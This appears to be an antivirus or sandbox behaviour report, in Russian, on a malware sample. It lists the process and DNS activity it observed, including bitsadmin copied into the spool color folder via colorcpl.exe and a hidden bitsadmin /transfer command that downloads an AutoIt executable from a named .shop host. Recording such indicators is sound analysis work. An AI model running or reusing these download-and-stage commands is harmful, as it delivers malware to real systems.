Техническая информация
- '<SYSTEM32>\spool\drivers\color\bitsadmin.exe' /transfer 38824423749 /priority foreground http://k7mr9rsier6.hugoeyagomucasltda.shop/?39381921611628757 "C:\Z35466700421\TYAN.ImController.2022.3805.425.AutoIt3.exe"
- C:\users\public\pv
- <SYSTEM32>\spool\drivers\color\bitsadmin.exe
- DNS ASK k7########6.hugoeyagomucasltda.shop
- '<SYSTEM32>\cmd.exe' /V /C "echo C:\Z35466700421\>C:\Users\Public\pv"&& exit (со скрытым окном)
- '<SYSTEM32>\colorcpl.exe' C:\\Windows\\System32\\bitsadmin.exe (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /reset (со скрытым окном)
- '<SYSTEM32>\spool\drivers\color\bitsadmin.exe' /transfer 38824423749 /priority foreground http://k7mr9rsier6.hugoeyagomucasltda.shop/?39381921611628757 "C:\Z35466700421\TYAN.ImController.2022.3805.425.AutoIt3.exe" (со скрытым окном)